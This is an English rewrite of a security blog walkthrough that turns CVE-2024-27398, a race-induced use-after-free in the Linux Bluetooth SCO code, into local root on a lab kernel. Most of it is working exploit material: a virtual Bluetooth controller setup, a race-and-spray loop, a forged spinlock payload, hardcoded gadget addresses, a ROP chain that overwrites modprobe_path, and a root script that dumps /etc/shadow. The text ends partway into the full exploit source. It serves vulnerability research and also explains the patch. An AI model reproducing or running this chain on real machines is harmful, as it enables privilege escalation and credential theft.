CVE-2024-27398: Exploiting a Linux Bluetooth SCO Use-After-Free with SMEP Bypass

Source attribution. This is an original English rewrite of the identically titled article published on Secunnix Cyber Security on 2026-04-25. The author is not clearly listed; the byline reads “Yayıncı: Anonymous” (“Publisher: Anonymous”). The original carries an “All rights reserved” notice (© Secunnix Cyber Security, “Tüm hakları saklıdır”), so this is a paraphrased English rewrite, not a verbatim translation. All figures, code samples, and the POC animation are reproduced from the original at their original positions, with credit. The vulnerability research is credited to the upstream PoC author sty886; the original article also credits lkmidas for the modprobe_path root technique.

Header image for the original Secunnix walkthrough of CVE-2024-27398 (Linux Bluetooth SCO UAF). *Source: original article.*

Executive Summary

CVE-2024-27398 is a race-induced use-after-free in the Linux kernel’s Bluetooth SCO (Synchronous Connection-Oriented link) subsystem, fixed in Linux 6.8.2+. Two concurrent connect() calls on the same SCO socket can be raced into creating two sco_conn objects, each with its own delayed_work timer. close() cancels only the timer attached to the surviving connection, so the orphaned timer stays pending against an sk that is then freed. About two seconds later the orphaned timer fires inside sco_sock_timeout(), takes sk->sk_lock, writes sk->sk_err, and calls sk->sk_state_change(sk): a function pointer that the attacker controls by then.

The Secunnix walkthrough chains the bug into a clean local privilege escalation on a tuned 6.8.0 lab kernel. The heap spray uses add_key(2): the user_key_payload header is 24 bytes, so a 980-byte payload lands in kmalloc-1024, the same merged cache the freed sco_pinfo came from. The spray forges a valid-looking DEBUG_SPINLOCK at payload offset 0x80 (so the magic check in do_raw_spin_lock() passes) and overwrites the sk_state_change function pointer with the address of an xchg eax, esp ; ret gadget in kernel text. When the timer fires, the swap pivots the kernel stack into a userspace page mapped at 0x81011000, and a pure-ROP chain calls memcpy(modprobe_path, "/tmp/x", 7). Executing an invalid-magic binary then triggers call_usermodehelper, which runs the attacker’s script as root. SMEP is bypassed because no userspace code is executed: every instruction runs from kernel .text. SMAP is disabled in the lab so that the kernel can read the userspace ROP chain. The article walks through the bug, the lab, the structure layout, the spray, the gadget, the chain, and the patch, and provides the full annotated POC.

Introduction

The original author opens by saying they stumbled across a minimal PoC for CVE-2024-27398 in sty886/sco-race-condition — just enough code to trigger the race — and decided to take it the rest of the way: heap-spray to reclaim the freed slot, forge the spinlock pattern, build a pivot, and turn it into root. All screenshots in this post are captured live from real QEMU/KVM runs against a custom Linux 6.8 lab kernel. The intended reader is comfortable with the SLUB allocator, can read C and x86-64 assembly fluently, and wants to see why every choice was made, not just what was done.

1. The Vulnerability

1.1 Vulnerable code

The bug lives in sco_sock_timeout() in net/bluetooth/sco.c, which is scheduled as delayed_work on the system workqueue whenever an SCO connection attempt is allowed to time out. The handler takes the per-socket spinlock, sets an error, and invokes the socket’s state-change callback:

static void sco_sock_timeout(struct work_struct *work)
{
    struct sco_conn *conn = container_of(work, struct sco_conn,
                                         timeout_work.work);
    struct sock *sk;

    sk = conn->sk;
    if (!sk)
        return;

    bh_lock_sock(sk);           /* [1] acquires sk->sk_lock.slock */
    sk->sk_err = ETIMEDOUT;
    sk->sk_state_change(sk);    /* [2] ← function pointer call     */
    bh_unlock_sock(sk);
    sock_put(sk);               /* [3] drops refcount               */
}

If sk has been freed and its slot reclaimed by an attacker-controlled allocation by the time the timer fires, sk->sk_state_change is whatever the attacker wrote — arbitrary kernel-mode RIP control.

1.2 The race condition

Two concurrent connect() calls on the same SCO socket can each create their own sco_conn and schedule their own timer. The trimmed-down diff below summarises where the locking went wrong:

 sco_connect() inside sco_sock_connect():
-    lock_sock(sk);         /* was here: serialized connect attempts */

     err = sco_chan_add(conn, sk, NULL);
     if (sk->sk_state == BT_CONNECTED)
         sco_sock_set_timer(sk, sk->sk_sndtimeo);

-    release_sock(sk);

And in sco_sock_connect() itself:

+    lock_sock(sk);
     if (sk->sk_state != BT_OPEN && sk->sk_state != BT_BOUND) {
+        release_sock(sk);
         return -EBADFD;
     }
-    lock_sock(sk);
     bacpy(&sco_pi(sk)->dst, &sa->sco_bdaddr);
-    release_sock(sk);

     err = sco_connect(sk);
-    lock_sock(sk);
     err = bt_sock_wait_state(...);

1.3 Race timeline

Two threads, two different destination addresses, simultaneous connect(). Both create a sco_conn and arm a 2-second timer. The last write to sco_pi(sk)->conn wins. When the userspace caller closes the socket, only that surviving connection’s timer is cancelled; the other connection’s timer stays armed, and its conn->sk still points at the socket, which is freed almost immediately. Two seconds later, the orphan timer’s callback executes against memory the attacker now controls.
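The timeline can be condensed into a deterministic userspace model. This is only a sketch of the bookkeeping, not kernel code: the `toy_` types and functions are hypothetical names, and the two "threads" are run back to back to show the last-writer-wins outcome without relying on real scheduling.

```c
#include <assert.h>
#include <stddef.h>

/* Toy model, not kernel code: each connection carries one armed timer. */
struct toy_conn {
    int timer_armed;
};

struct toy_sock {
    struct toy_conn *conn;   /* plays the role of sco_pi(sk)->conn */
};

/* An unserialised connect(): arm a timer, then overwrite sk->conn. */
static void toy_connect(struct toy_sock *sk, struct toy_conn *c)
{
    assert(sk != NULL && c != NULL);
    c->timer_armed = 1;
    sk->conn = c;            /* last writer wins */
}

/* close(): cancels only the timer reachable through sk->conn. */
static void toy_close(struct toy_sock *sk)
{
    if (sk->conn)
        sk->conn->timer_armed = 0;
    sk->conn = NULL;
}

/* Returns how many timers are still armed after two connects and a close. */
int toy_orphan_timers(void)
{
    struct toy_conn a = {0}, b = {0};
    struct toy_sock sk = {0};

    toy_connect(&sk, &a);    /* thread 1 */
    toy_connect(&sk, &b);    /* thread 2 overwrites the pointer */
    toy_close(&sk);          /* only b's timer is cancelled */

    return a.timer_armed + b.timer_armed;
}
```

In this model `toy_orphan_timers()` returns 1: the first connection is no longer reachable from the socket, so nothing cancels its timer.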

1.4 The official patch

Linux 6.8.2 fixed this with three coordinated changes: (1) a sco_conn_lock mutex to serialise access; (2) sock_hold(sk) before the timer is scheduled and sock_put(sk) at the end of sco_sock_timeout(), so the socket can’t be freed underneath the timer; (3) replacing async cancel_delayed_work() with cancel_delayed_work_sync() so teardown waits for any already-running timer handler to finish.
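Change (2) is a plain reference-counting argument, which a toy model makes concrete. The sketch below is an illustration under stated assumptions, not the kernel's implementation: `toy_sk`, `toy_hold`, `toy_put`, and `toy_freed_before_timer` are hypothetical names, and "freeing" is just a flag.

```c
#include <assert.h>

/* Toy refcounted object standing in for struct sock; not kernel code. */
struct toy_sk {
    int refcnt;
    int freed;
};

static void toy_hold(struct toy_sk *sk)
{
    assert(!sk->freed);
    sk->refcnt++;
}

static void toy_put(struct toy_sk *sk)
{
    assert(sk->refcnt > 0);
    if (--sk->refcnt == 0)
        sk->freed = 1;       /* a real kernel would release the slab object here */
}

/*
 * Returns 1 if the object is already freed when the timer handler starts.
 * timer_holds_ref selects the patched behaviour (reference taken when arming).
 */
int toy_freed_before_timer(int timer_holds_ref)
{
    struct toy_sk sk = { .refcnt = 1, .freed = 0 };  /* the socket's own reference */

    if (timer_holds_ref)
        toy_hold(&sk);       /* reference owned by the pending timer */

    toy_put(&sk);            /* close() drops the socket's reference */
    int freed_at_fire = sk.freed;

    if (timer_holds_ref)
        toy_put(&sk);        /* the handler drops its reference when done */

    return freed_at_fire;
}
```

Without the extra reference the object is gone by the time the handler runs; with it, the final put inside the handler is what releases the memory.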

2. Lab Setup

2.1 Kernel configuration

A custom Linux 6.8 build with a few deliberate choices. Bluetooth compiled in (CONFIG_BT=y, CONFIG_BT_BREDR=y, CONFIG_BT_HCIVHCI=y for /dev/vhci). SLUB enabled, CONFIG_SLAB_MERGE_DEFAULT=y. Crucially, CONFIG_KASAN=n and CONFIG_MEMCG_KMEM=n: with either of those enabled, the SCO cache wouldn’t merge into the generic kmalloc-1024 and the add_key spray would never reach the freed slot. CONFIG_DEBUG_SPINLOCK=y widens the race window and pushes sco_pinfo into the 1024-byte cache. CONFIG_LOCKDEP=n stops the lock validator from tripping on the synthetic spinlock that lives inside the spray payload.

2.2 QEMU launch parameters

qemu-system-x86_64 \
    -m 4096 \
    -smp 2 \
    -cpu host,+smep,-smap \
    -enable-kvm \
    -kernel linux-6.8/arch/x86/boot/bzImage \
    -initrd exploit.cpio.gz \
    -append "console=ttyS0 nokaslr loglevel=7 \
             panic_on_oops=0 hung_task_timeout_secs=0 \
             lockdep=off" \
    -nographic \
    -no-reboot

Parameter	Reason
`-cpu host,+smep,-smap`	SMEP on (forces pure-ROP); SMAP off (kernel reads userspace pivot page)
`nokaslr`	All kernel addresses fixed — no info leak needed
`panic_on_oops=0`	Kernel oops at `RIP=0x0` does not kill the machine — exploit continues
`lockdep=off`	Lock validator would trip on the fake-but-valid spinlock spray data
`-smp 2`	Two CPUs required for the race to be meaningful

Lab QEMU parameters. Source: original article.

3. Target Structure Analysis

3.1 `struct sco_pinfo` layout

struct sco_pinfo {
    struct sock    sk;       /* must be first — pointer cast magic */
    bdaddr_t       src;
    bdaddr_t       dst;
    __u32          flags;
    __u16          setting;
    __u8           cmsg_mask;
    struct bt_codec codec;
    struct sco_conn *conn;
};

With CONFIG_DEBUG_SPINLOCK=y, spinlock_t expands from 4 bytes to 24 bytes (adding magic, owner_cpu, owner for debugging). That inflates struct sock and pushes sco_pinfo to 984 bytes — SLUB rounds it to kmalloc-1024.

3.2 Critical offsets in `struct sock`

$ pahole -C sco_pinfo vmlinux
struct sco_pinfo {
    struct sock  sk;     /* 0   904 */
    ...                  /* 904  80 */
    /* size: 984, cachelines: 16, members: 7 */
};

$ pahole -C sock vmlinux | grep -E "sk_lock|sk_state_change"
    socket_lock_t  sk_lock;              /*  152    72 */
    void (*sk_state_change)(struct sock *); /* 824     8 */

So sk_lock sits at offset 0x98 (152) and sk_state_change at 0x338 (824).

3.3 `socket_lock_t` internals (DEBUG_SPINLOCK=y)

socket_lock_t (72 bytes total):
  +0x00  spinlock_t slock (24 bytes):
           +0x00  raw_lock.val   (4B)  ← 0 = unlocked
           +0x04  magic          (4B)  ← MUST be 0xdead4ead
           +0x08  owner_cpu      (4B)  ← -1 = unowned
           +0x0C  pad            (4B)
           +0x10  owner          (8B)  ← (void*)-1 = unowned
  +0x18  owned                  (4B)
  +0x1C  pad                    (4B)
  +0x20  wq (wait_queue_head_t) (40B)

The magic field is checked by do_raw_spin_lock() on every acquisition. If it doesn’t equal 0xdead4ead, the kernel warns and may panic. The spray has to forge this faithfully or the chain dies before reaching sk_state_change.
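The 24-byte layout listed above can be mirrored in userspace and checked at compile time. This is a simplified sketch: the struct and function names are hypothetical, the field types assume x86-64, and `toy_lock_looks_sane()` only tests for a freshly initialised, unowned lock rather than reproducing every check the kernel's debug code performs.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define TOY_SPINLOCK_MAGIC 0xdead4eadU

/* Userspace mirror of the debug spinlock layout from section 3.3. */
struct toy_debug_spinlock {
    uint32_t raw_lock;   /* 0 = unlocked */
    uint32_t magic;      /* must equal TOY_SPINLOCK_MAGIC */
    uint32_t owner_cpu;  /* 0xffffffff = unowned */
    uint32_t pad;
    uint64_t owner;      /* all ones = unowned */
};

/* Compile-time checks that the mirror matches the documented offsets. */
_Static_assert(offsetof(struct toy_debug_spinlock, magic) == 0x04, "magic offset");
_Static_assert(offsetof(struct toy_debug_spinlock, owner_cpu) == 0x08, "owner_cpu offset");
_Static_assert(offsetof(struct toy_debug_spinlock, owner) == 0x10, "owner offset");
_Static_assert(sizeof(struct toy_debug_spinlock) == 24, "total size");

/* Returns 1 when the lock is unlocked, unowned, and carries the right magic. */
int toy_lock_looks_sane(const struct toy_debug_spinlock *l)
{
    assert(l != NULL);
    return l->raw_lock == 0 &&
           l->magic == TOY_SPINLOCK_MAGIC &&
           l->owner_cpu == UINT32_MAX &&
           l->owner == UINT64_MAX;
}
```

A zero-filled slot fails this check because of the magic field alone, which is why zeroed or random reclaimed memory would not get past the lock acquisition.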

4. Exploit Stage 1: Triggering the UAF

4.1 Virtual HCI setup

No real Bluetooth hardware is needed. /dev/vhci exposes a virtual HCI controller; the exploit just has to answer the HCI command stream the kernel issues during stack init:

/* Open virtual HCI device */
vfd = open("/dev/vhci", O_RDWR);

/* Initialize as BR/EDR controller */
uint8_t vp[2] = {0xff, 0};
write(vfd, vp, 2);
usleep(200000);

/* Start HCI command response thread */
pthread_create(&vt, NULL, vhci_thread, NULL);
usleep(500000);

/* Bring up the hci0 interface */
int hfd = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI);
ioctl(hfd, HCIDEVUP, 0);   /* _IOW(0x48, 201, int) */
close(hfd);

sleep(4);  /* wait for HCI initialization sequence to complete */
printf("[*] HCI ready\n");

The vHCI thread answers HCI_Create_Connection by forging a Connection-Complete event with handle = 1, so the kernel state machine moves forward without ever talking to a real radio:

case 0x0401: {  /* HCI_Create_Connection */
    uint8_t ev[20] = {0};
    ev[0] = 4;     /* HCI_EVENT_PKT */
    ev[1] = 0x03;  /* HCI_EV_CONN_COMPLETE */
    ev[2] = 11;    /* parameter length */
    ev[3] = 0;     /* status = success */
    ev[4] = 0x01; ev[5] = 0x00;   /* handle = 1 */
    memcpy(&ev[6], &buf[4], 6);   /* copy BD_ADDR from command */
    ev[12] = 0x01; ev[13] = 0x00; /* link type = ACL, enc = off */
    write(vfd, ev, 14);
    break;
}

Figure 1: exploit startup. The `xchg eax, esp` gadget at `0xffffffff81011cf1` is selected as the stack pivot and two userspace pages are mapped. *Source: original article.*

Figure 2: “HCI ready”. The virtual Bluetooth controller hci0 is up via `/dev/vhci`. *Source: original article.*

4.2 Race trigger per iteration

Per race attempt: open an SCO socket, set a 2-second send timeout, spin up two threads that connect() simultaneously to two different destination addresses (one all-zeros, one all-ones), join, close, then spray:

for (int batch = 0; batch < 100; batch++) {
    /* 2000 race attempts + 2000 add_key calls per batch */
    for (int i = 0; i < BATCH_SZ; i++) {
        /* [1] Trigger race → create orphan timer → free sk */
        g_fd = socket(AF_BLUETOOTH, SOCK_SEQPACKET|SOCK_NONBLOCK, BTPROTO_SCO);
        setsockopt(g_fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv));
        pthread_barrier_init(&g_bar, NULL, 2);
        pthread_create(&t1, NULL, c1, NULL);
        pthread_create(&t2, NULL, c2, NULL);
        pthread_join(t1, NULL); pthread_join(t2, NULL);
        pthread_barrier_destroy(&g_bar);
        close(g_fd);  /* ← sk freed here */

        /* [2] Spray — try to land in the freed slot */
        char desc[32];
        snprintf(desc, sizeof(desc), "s%d_%d", batch, i);
        syscall(__NR_add_key, "user", desc, g_kd, sizeof(g_kd), KEY_SPEC_SESSION_KEYRING);
    }

    /* [3] Wait for orphan timers to fire */
    printf("[*] Waiting 3s...\n");
    sleep(3);

    /* [4] Trigger modprobe if modprobe_path was overwritten */
    for (int t = 0; t < 5; t++) {
        system("/tmp/dummy 2>/dev/null; true");
        usleep(500000);
        if (access("/tmp/pwn", F_OK) == 0) goto win;
    }
}

Figure 3: race-and-spray loop, Batch 0 in progress. Each iteration creates a fresh SCO socket and races two simultaneous `connect()` calls. *Source: original article.*

Figure 4: after 2000 iterations the exploit waits 3 seconds for the `SO_SNDTIMEO=2s` orphan timer to fire against freed memory. *Source: original article.*

5. Exploit Stage 2: Heap Spray via `add_key`

5.1 Why `add_key`?

The add_key(2) syscall with key type "user" allocates a user_key_payload (24-byte header) plus the caller’s payload. With datalen = 980 the total allocation is 1004 bytes — rounded up to kmalloc-1024, the same merged cache the freed sco_pinfo lives in (when KASAN/MEMCG are off).
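The size-class arithmetic is easy to check by hand. The sketch below assumes the usual generic kmalloc size classes of an x86-64 SLUB build; the table and the name `toy_kmalloc_class` are illustrative and are not read from the lab kernel.

```c
#include <assert.h>
#include <stddef.h>

/* Generic kmalloc size classes on a typical x86-64 SLUB build (assumed). */
static const size_t toy_kmalloc_classes[] = {
    8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};

#define TOY_NCLASSES (sizeof(toy_kmalloc_classes) / sizeof(toy_kmalloc_classes[0]))

/* Returns the smallest class that fits `size`, or 0 if it exceeds the table. */
size_t toy_kmalloc_class(size_t size)
{
    assert(size > 0);
    for (size_t i = 0; i < TOY_NCLASSES; i++)
        if (size <= toy_kmalloc_classes[i])
            return toy_kmalloc_classes[i];
    return 0;
}
```

Both `toy_kmalloc_class(984)` (the sco_pinfo size) and `toy_kmalloc_class(24 + 980)` (header plus key data) come out as 1024, which is the whole point of choosing datalen = 980.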

5.2 Spray payload layout

Allocation layout (1024 bytes total):
┌──────────────────────────────────────────────────────┐
│ user_key_payload header (24 bytes)                    │
│   +0x00 rcu_head (16B) │ datalen (2B) │ pad (6B)     │
├──────────────────────────────────────────────────────┤  ← payload_data[0]
│ [maps to sk+0x18]                                    │
│   ...                                                │
│ [maps to sk+0x98 = sk_lock.slock]                    │
│   payload_data[0x80]  raw_lock   = 0x00000000        │  ← unlocked
│   payload_data[0x84]  magic      = 0xdead4ead        │  ← REQUIRED
│   payload_data[0x88]  owner_cpu  = 0xffffffff        │  ← -1 (unowned)
│   payload_data[0x8c]  pad        = 0x00000000        │
│   payload_data[0x90]  owner      = 0xffffffffffffffff│  ← (void*)-1
│   ...                                                │
│ [maps to sk+0x338 = sk_state_change]                 │
│   payload_data[0x320] = 0xffffffff81011cf1           │  ← our gadget
└──────────────────────────────────────────────────────┘

static char g_kd[980];

static void build_spray(void) {
    memset(g_kd, 0, sizeof(g_kd));
    int h = 24;  /* user_key_payload header size */

    /* sk+0x98: valid unlocked DEBUG_SPINLOCK */
    int slock = SK_LOCK_OFF - h;  /* 0x98 - 0x18 = 0x80 */
    *(uint32_t*)(g_kd + slock + 0)  = 0;           /* raw_lock = unlocked */
    *(uint32_t*)(g_kd + slock + 4)  = 0xdead4ead;  /* magic — checked by kernel */
    *(uint32_t*)(g_kd + slock + 8)  = 0xffffffff;  /* owner_cpu = -1 */
    *(uint32_t*)(g_kd + slock + 12) = 0;
    *(uint64_t*)(g_kd + slock + 16) = (uint64_t)-1; /* owner = -1 */

    /* sk+0x338: overwrite sk_state_change with our pivot gadget */
    *(uint64_t*)(g_kd + SK_STCHG_OFF - h) = XCHG_EAX_ESP;
    /* SK_STCHG_OFF=0x338, h=0x18, so payload_data[0x320] = gadget addr */
}
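The two subtractions in build_spray() follow one rule: an offset inside the freed object maps to the key data at that offset minus the 24-byte header. A small helper makes the rule explicit; `toy_payload_index` and `TOY_KEY_HDR` are hypothetical names used only for this sketch.

```c
#include <assert.h>
#include <stddef.h>

#define TOY_KEY_HDR 24u   /* user_key_payload header size, per the article */

/* Maps an offset inside the freed object to an index into the key data. */
size_t toy_payload_index(size_t obj_off)
{
    /* The first 24 bytes are the header and are not caller-controlled. */
    assert(obj_off >= TOY_KEY_HDR);
    return obj_off - TOY_KEY_HDR;
}
```

With the pahole offsets from section 3.2, `toy_payload_index(0x98)` gives 0x80 and `toy_payload_index(0x338)` gives 0x320, and the 8-byte pointer written at 0x320 still ends inside the 980-byte buffer.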

5.3 The spray loop

100 batches × 2000 iterations. Each iteration triggers the race, closes the socket, sprays once with add_key. Between batches, sleep 3 s so the SO_SNDTIMEO=2s timers can fire, then up to five attempts to launch /tmp/dummy — if modprobe_path was overwritten, the kernel will dispatch the attacker’s script and /tmp/pwn will appear.

6. Exploit Stage 3: UAF Fires — KASAN Detection

On a KASAN-enabled build, the UAF is loud: when the orphan timer runs, do_raw_spin_lock reads the freed spinlock’s magic field and KASAN catches the access. The workqueue context (sco_sock_timeout) is explicitly labelled in the report. On the exploitation kernel (KASAN off), the same access is silent: the spray has forged 0xdead4ead, the magic check passes, the lock is “taken”, and execution carries on to the function pointer call.

Figure 5: `BUG: KASAN: slab-use-after-free in do_raw_spin_lock`. The orphan timer dereferences a freed `sk`. *Source: original article.*

Figure 6: the same KASAN run, showing the `sco_sock_timeout` workqueue context. *Source: original article.*

7. Exploit Stage 4: SMEP Bypass via `xchg eax, esp`

7.1 Why we can’t jump to shellcode

SMEP (Supervisor Mode Execution Prevention) faults if the kernel’s RIP ever lands on a userspace address. A naive callback-to-userspace-shellcode primitive cannot work. ROP solves it: every instruction executes from kernel .text; ROP just reads chain data from userspace memory, which SMEP is fine with (SMAP would object, but SMAP is off here).

7.2 The `xchg eax, esp ; ret` gadget

Two bytes, 94 c3, appear at 0xffffffff81011cf1. When the kernel jumps there via sk_state_change(sk), RAX holds the gadget’s own address. xchg eax, esp exchanges the low 32 bits of RAX and RSP, and because a write to a 32-bit register zero-extends into the full 64-bit register, RSP becomes 0x0000000081011cf1: a userspace address. The subsequent ret pops the first ROP gadget address from that userspace page.

7.3 Mapping the pivot page

Two consecutive userspace pages at 0x81011000–0x81012fff are mmap’d with MAP_FIXED to hold the chain. SMEP doesn’t prevent the kernel from reading them; SMAP is off, so it doesn’t prevent that either.
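The address arithmetic behind the pivot and the mapping can be written out as three small helpers. This is a sketch of the calculation only; the `toy_` names are hypothetical and a 4096-byte page size is assumed.

```c
#include <assert.h>
#include <stdint.h>

#define TOY_PAGE_SIZE 4096u

/* A 32-bit register write on x86-64 zero-extends into the full 64 bits. */
uint64_t toy_pivot_rsp(uint64_t rax)
{
    return (uint64_t)(uint32_t)rax;
}

/* Base of the page containing addr. */
uint64_t toy_page_base(uint64_t addr)
{
    return addr & ~(uint64_t)(TOY_PAGE_SIZE - 1);
}

/* Returns 1 if [addr, addr+len) lies inside `pages` pages starting at base. */
int toy_in_mapping(uint64_t addr, uint64_t len, uint64_t base, unsigned pages)
{
    assert(pages > 0);
    return addr >= base && addr + len <= base + (uint64_t)pages * TOY_PAGE_SIZE;
}
```

For the gadget address 0xffffffff81011cf1 this gives a pivot target of 0x81011cf1 and a page base of 0x81011000. A chain of nine 8-byte slots starting at the pivot target fits comfortably inside the two mapped pages.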

7.4 Building the ROP chain

/* Kernel #23 (6.8.0, no KASAN, nokaslr) gadget addresses */
#define POP_RDI_RET    0xffffffff8104c1adUL  /* pop rdi; ret */
#define POP_RSI_RET    0xffffffff811bb9beUL  /* pop rsi; ret */
#define POP_RDX_RET    0xffffffff810bc1b2UL  /* pop rdx; ret */
#define MEMCPY_ADDR    0xffffffff82905e70UL  /* kernel memcpy */
#define MODPROBE_PATH  0xffffffff8356a020UL  /* modprobe_path symbol */
#define STRING_PAGE    0xdead0000UL          /* userspace: "/tmp/x" */

uint64_t *rop = (uint64_t*)(PIVOT_ADDR);    /* 0x81011cf1 */

rop[0] = POP_RDI_RET;    /* pop rdi; ret           */
rop[1] = MODPROBE_PATH;  /*   rdi = &modprobe_path  */
rop[2] = POP_RSI_RET;    /* pop rsi; ret           */
rop[3] = STRING_PAGE;    /*   rsi = 0xdead0000 ("/tmp/x") */
rop[4] = POP_RDX_RET;    /* pop rdx; ret           */
rop[5] = 7;              /*   rdx = 7               */
rop[6] = MEMCPY_ADDR;    /* memcpy(dst, src, len)  */
rop[7] = XCHG_EAX_ESP + 1; /* 0xffffffff81011cf2: just 'ret' */
                            /* cascade into zeroed memory → RIP=0 → oops */

0x81011000  [page boundary]
    ...
0x81011cf1  rop[0] = 0xffffffff8104c1ad  pop rdi; ret
0x81011cf9  rop[1] = 0xffffffff8356a020  modprobe_path
0x81011d01  rop[2] = 0xffffffff811bb9be  pop rsi; ret
0x81011d09  rop[3] = 0x00000000dead0000  STRING_PAGE
0x81011d11  rop[4] = 0xffffffff810bc1b2  pop rdx; ret
0x81011d19  rop[5] = 0x0000000000000007  length = 7
0x81011d21  rop[6] = 0xffffffff82905e70  memcpy
0x81011d29  rop[7] = 0xffffffff81011cf2  trailing ret
0x81011d31  0x0000000000000000           ← crash here (RIP=0)
    ...
0x81013000  [page boundary]
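The addresses in the table are the pivot target plus eight bytes per slot. A one-line helper, with the hypothetical name `toy_slot_addr`, is enough to recompute them as a sanity check.

```c
#include <assert.h>
#include <stdint.h>

/* Address of the i-th 8-byte slot, counting from where RSP lands after the pivot. */
uint64_t toy_slot_addr(uint64_t pivot_rsp, unsigned i)
{
    assert(i < 512);  /* arbitrary sanity bound for this sketch */
    return pivot_rsp + 8ull * i;
}
```

Slot 7 lands at 0x81011d29 and the zeroed slot 8 at 0x81011d31. Once that zero has been popped into RIP, RSP has advanced to slot 9 at 0x81011d39, which agrees with the RSP value reported in Figure 8.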

8. Exploit Stage 5: RIP Control and Kernel Oops

The sequence at firing time:

(1) bh_lock_sock(sk) reads the forged magic = 0xdead4ead; the check passes and the lock counts as acquired.
(2) sk->sk_err = ETIMEDOUT is a harmless write.
(3) sk->sk_state_change(sk) jumps to the xchg eax, esp ; ret gadget.
(4) xchg swaps the low 32 bits of RAX and RSP, which redirects the kernel stack into userspace.
(5) ret loads the first ROP gadget address from 0x81011cf1.
(6) The three pop reg ; ret gadgets stage RDI, RSI, RDX.
(7) memcpy(modprobe_path, "/tmp/x", 7) runs in kernel context.
(8) The trailing ret returns into zeroed memory, so RIP becomes 0x0 and the kernel oopses. Because panic_on_oops=0, the machine survives and only the offending task is killed.

Figure 7: kernel oops dump. `RIP=0x0000000000000000` after the ROP chain’s trailing `ret` sled drops into zeroed memory. *Source: original article.*

Figure 8: `RSP=0x0000000081011d39` after the `xchg eax, esp` gadget pivots the kernel stack into userspace, where the ROP chain lives. *Source: original article.*

Figure 9: `memcpy()` returns and `RAX` holds `0xffffffff8356a020` (`modprobe_path`), proof that the chain ran inside the kernel. *Source: original article.*

9. Exploit Stage 6: Root via `modprobe_path`

9.1 How `modprobe_path` gives us root

When the kernel encounters an unrecognised binary format (the canonical trigger: an executable whose first 4 bytes don’t match any registered handler), it calls request_module("binfmt-XXXX"), which internally invokes call_usermodehelper(modprobe_path, ...) as root, bypassing all userspace privilege checks. modprobe_path normally points to /sbin/modprobe. Overwriting it to /tmp/x means the kernel runs the attacker’s shell script as uid=0.

9.2 The root script

FILE *f = fopen("/tmp/x", "w");
fprintf(f,
    "#!/bin/sh\n"
    "echo '=== CVE-2024-27398 ROOT ===' > /tmp/pwn\n"
    "uname -a >> /tmp/pwn\n"
    "id >> /tmp/pwn\n"
    "echo '--- /etc/shadow ---' >> /tmp/pwn\n"
    "cat /etc/shadow >> /tmp/pwn 2>/dev/null\n"
    "echo '--- ROOTED ---' >> /tmp/pwn\n");
fclose(f);
chmod("/tmp/x", 0755);

int d = open("/tmp/dummy", O_CREAT|O_WRONLY|O_TRUNC, 0755);
write(d, "\xff\xff\xff\xff", 4);  /* invalid ELF magic */
close(d);

9.3 Triggering and confirming root

After each 3-second wait, the exploit invokes /tmp/dummy up to five times. The kernel sees an unrecognised binary format and calls request_module(), which calls call_usermodehelper("/tmp/x", ...) as root. That runs the script, which writes the uid=0 banner into /tmp/pwn. The exploit then calls access("/tmp/pwn", F_OK); if the file exists, root was achieved.

Figure 10: `[!!!] ROOT! (SMEP BYPASS)`. `/tmp/pwn` contains the uid=0 banner written by the script the kernel just ran on our behalf. *Source: original article.*
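The same mechanism gives defenders a cheap check, since the kernel exposes the current helper path through the kernel.modprobe sysctl at /proc/sys/kernel/modprobe. The function below is a minimal sketch and is not part of the original article: `toy_modprobe_path_is` is a hypothetical name, and the expected value (commonly /sbin/modprobe) depends on the distribution.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/*
 * Returns 1 if the first line of `sysctl_file` equals `expected`,
 * 0 if it differs, and -1 if the file cannot be read.
 */
int toy_modprobe_path_is(const char *sysctl_file, const char *expected)
{
    assert(sysctl_file != NULL && expected != NULL);

    char line[256];
    FILE *f = fopen(sysctl_file, "r");
    if (!f)
        return -1;
    if (!fgets(line, sizeof(line), f)) {
        fclose(f);
        return -1;
    }
    fclose(f);

    line[strcspn(line, "\n")] = '\0';   /* strip the trailing newline */
    return strcmp(line, expected) == 0;
}
```

A monitoring script could call `toy_modprobe_path_is("/proc/sys/kernel/modprobe", "/sbin/modprobe")` and raise an alert on a 0 result, which is what the lab machine would report after the chain has run.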

10. Full Exploit Source

Animated POC: full CVE-2024-27398 exploit run ending in root. *Source: original article.*

The complete annotated C source, reproduced verbatim from the original article:

/*
 * CVE-2024-27398 LPE — SMEP BYPASS via xchg eax,esp pivot + pure ROP
 *
 * Vulnerability: Use-After-Free in sco_sock_timeout() via race in
 * sco_sock_connect()/sco_connect() — missing lock_sock serialization.
 *
 * Technique:
 *   sk_state_change = xchg_eax_esp_ret (0xffffffff81011cf1)
 *   xchg eax, esp → RSP = 0x81011cf1 (mmap'd userspace page)
 *   ROP: pop rdi/rsi/rdx → memcpy(modprobe_path, "/tmp/x", 7)
 *   All gadgets in kernel .text → SMEP bypassed
 *   SMAP must be off (nosmap) → kernel reads userspace ROP data
 *
 * Target: Linux 6.8.0 #23, CONFIG_KASAN=n, CONFIG_MEMCG_KMEM=n,
 *         CONFIG_DEBUG_SPINLOCK=y, nokaslr, SMEP on, SMAP off
 */
#define _GNU_SOURCE
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <pthread.h>
#include <stdio.h>
#include <stdint.h>
#include <poll.h>

/* ── Kernel symbol and gadget addresses (6.8.0 #23, nokaslr) ───────────── */
#define XCHG_EAX_ESP   0xffffffff81011cf1UL  /* 94 c3: xchg eax,esp; ret */
#define PIVOT_ADDR     (XCHG_EAX_ESP & 0xFFFFFFFF)  /* → 0x81011cf1     */
#define POP_RDI_RET    0xffffffff8104c1adUL  /* 5f c3: pop rdi; ret      */
#define POP_RSI_RET    0xffffffff811bb9beUL  /* 5e c3: pop rsi; ret      */
#define POP_RDX_RET    0xffffffff810bc1b2UL  /* 5a c3: pop rdx; ret      */
#define MEMCPY_ADDR    0xffffffff82905e70UL  /* kernel memcpy()           */
#define MODPROBE_PATH  0xffffffff8356a020UL  /* char modprobe_path[256]   */
#define STRING_PAGE    0xdead0000UL          /* userspace page: "/tmp/x"  */

/* ── struct sock field offsets ──────────────────────────────────────── */
